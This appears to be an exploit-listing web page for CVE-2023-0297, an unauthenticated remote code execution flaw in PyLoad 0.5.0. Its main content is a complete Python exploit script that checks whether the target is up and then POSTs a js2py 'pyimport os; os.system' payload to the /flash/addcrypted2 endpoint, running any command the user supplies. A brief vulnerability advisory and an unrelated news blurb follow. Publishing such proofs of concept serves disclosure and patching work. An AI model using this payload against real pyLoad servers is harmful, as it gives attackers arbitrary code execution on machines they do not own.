Headline
PyLoad 0.5.0 Remote Code Execution
PyLoad version 0.5.0 suffers from an unauthenticated remote code execution vulnerability.
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)# Date: 06-10-2023# Credits: bAu @bauh0lz # Exploit Author: Gabriel Lima (0xGabe)# Vendor Homepage: https://pyload.net/# Software Link: https://github.com/pyload/pyload# Version: 0.5.0# Tested on: Ubuntu 20.04.6# CVE: CVE-2023-0297import requests, argparseparser = argparse.ArgumentParser()parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')arguments = parser.parse_args()def doRequest(url): try: res = requests.get(url) if res.status_code == 200: return True else: return False except requests.exceptions.RequestException as e: print("[!] Maybe the host is offline :", e) exit()def runExploit(url, cmd): endpoint = url + '/flash/addcrypted2' if " " in cmd: validCommand = cmd.replace(" ", "%20") else: validCommand = cmd payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload) print('[+] The exploit has be executeded in target machine. ')def main(targetUrl, Command): print('[+] Check if target host is alive: ' + targetUrl) alive = doRequest(targetUrl) if alive == True: print("[+] Host up, let's exploit! ") runExploit(targetUrl,Command) else: print('[-] Host down! ')if(arguments.url != None and arguments.cmd != None): targetUrl = arguments.url Command = arguments.cmd main(targetUrl, Command)
Related news
Hello everyone! This episode and will be about latest news in my Vulristics project. EPSS v3 The third iteration of the Exploit Prediction Scoring System (EPSS) was released in March. It is stated that EPSS has become 82% better. There is a pretty cool and detailed article about the changes. For example, EPSS Team began to analyze not 16 parameters […]
pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which is on port 8000 and can not be used by external hosts. A secondary Click N Load service runs on port 9666 and can be used remotely without authentication.
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.